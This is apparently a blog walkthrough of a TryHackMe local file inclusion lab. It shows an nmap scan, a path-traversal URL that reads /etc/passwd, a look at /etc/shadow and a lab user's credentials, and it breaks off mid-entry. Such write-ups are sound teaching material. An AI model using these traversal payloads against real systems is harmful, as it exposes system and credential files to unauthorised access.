Posts

Showing posts from December, 2020

Try Hack Me Local File Inclusion walkthrough

Try Hack Me Title - inclusion vulnerability - Local file inclusion Flag's - root.txt -        user.txt - ip address - 10.10.62.75 Lets start >>> # lets scan the website by nmap nmap -sS -sC -sV 10.10.62.75 # port 22 # port 80 # lets open web page open on port 80 in url http://10.10.62.75 # found article's on LFI & RFI # we know that vulnerability is LFI # change the parameter in url > the url looks like 10.10.62.75/article?name=lfi?article (now change the parameter and see) 10.10.62.75/article?name=../../../etc/passwd # we got access to /etc/passwd file # this data leads to sensitve data exposure and RCE # after analyzing /etc/passwd file # there are 2 users "root" & "falconfeast" # after searching in /etc/shadow file # it is using sha512 hashing algorithm tried to decrypt the passwd but nothing found # we dont have passwd for "root" # but in /etc/passwd file we found "falconfeast:rootpassword" user = falconfeast pass ...